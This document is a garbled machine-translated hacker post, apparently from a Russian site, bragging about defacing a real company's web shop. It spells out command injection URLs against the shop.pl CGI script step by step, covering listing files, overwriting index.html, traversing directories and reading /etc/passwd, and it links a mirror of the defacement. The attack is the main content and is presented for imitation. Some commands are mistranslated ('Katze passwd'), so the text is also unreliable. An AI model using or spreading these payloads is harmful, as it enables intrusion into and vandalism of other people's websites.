www.hawk-assoc.com Anfälligkeit für Skript shop.pl
Irgendwie habe ich auf einer Website auf das Skript stolperte www.hawk-assoc.com shop.pl.
Das Skript übernimmt die folgende Abfrage:
http://www.xxx.com/cgi-local/shop.pl/page=index.html
sofort vspolmilsya ziemlich alt Fehler im Skript (die Fähigkeit , Befehle auszuführen):
http: //www.xxx.com/cgi-local/shop.pl/page=; ls |
http: //www.xxx.com/cgi-local/shop.pl/page=; id |
http://www.xxx.com/cgi-local/shop.pl/page=;cat shop.pl |
tatsächlich perform einführen nicht besonders komplex zu verunstalten.
zu beginnen , eine index.html - Datei zu erstellen:
http://www.xxx.com/cgi-local/shop.pl/page=;echo verunstalten: Durito> index.html |
Als nächstes erstellen Sie eine Kopie der Datei oben in das Verzeichnis:
http://www.xxx.com/cgi-local/shop.pl/page=;cp index.html .. |
das ist der ganze Entstellung.
sondern weil es war interessant und andere Verzeichnisse mögen.
aber das Skript harter Schnitt /, so das Team:
http://www.xxx.com/cgi-local/shop.pl/page=;ls ../ cgi-bin |
- nein
Ich arbeitete, gab ein Skript Fehlermeldung aus.
aber dann erinnerte ich das Symbol ;!
Mit ihm können Sie Befehle nacheinander ausführen.
Führen jeder nachfolgende Befehl beginnt erst nach Abschluss der
vorherige.
Ich geben Sie den folgenden Befehl ein :
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..; ls |
Gehen Sie zurück und eine Auflistung der Verzeichnisebene zu sehen.
usw:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..; cd ..; cd .. ; ls | und ich habe an die Wurzel.
Reise durch die Ordner ist auch nicht schwer:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..; cd ..; cd .. ; cd etc; ls | Das ist bedauerlich , passwd gefunden:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..; cd ..; cd .. ; cd etc; Katze passwd | usw.
Das ist alles.
und hier ist der Spiegel Rissbildung:
http://taxidermia.void.ru/mirrors/2003/09/22/www.hawk-assoc.com
Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!
|
Wie es? Abonnieren Sie
RSS Nachrichten!
Sie können auch shram.kiev.ua unterstützen, klicken Sie auf:
Seien Sie nicht zu Ihren Freunden und finden Sie diese Informationen, teilen mit ihnen den Artikel nicht in Ordnung!
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.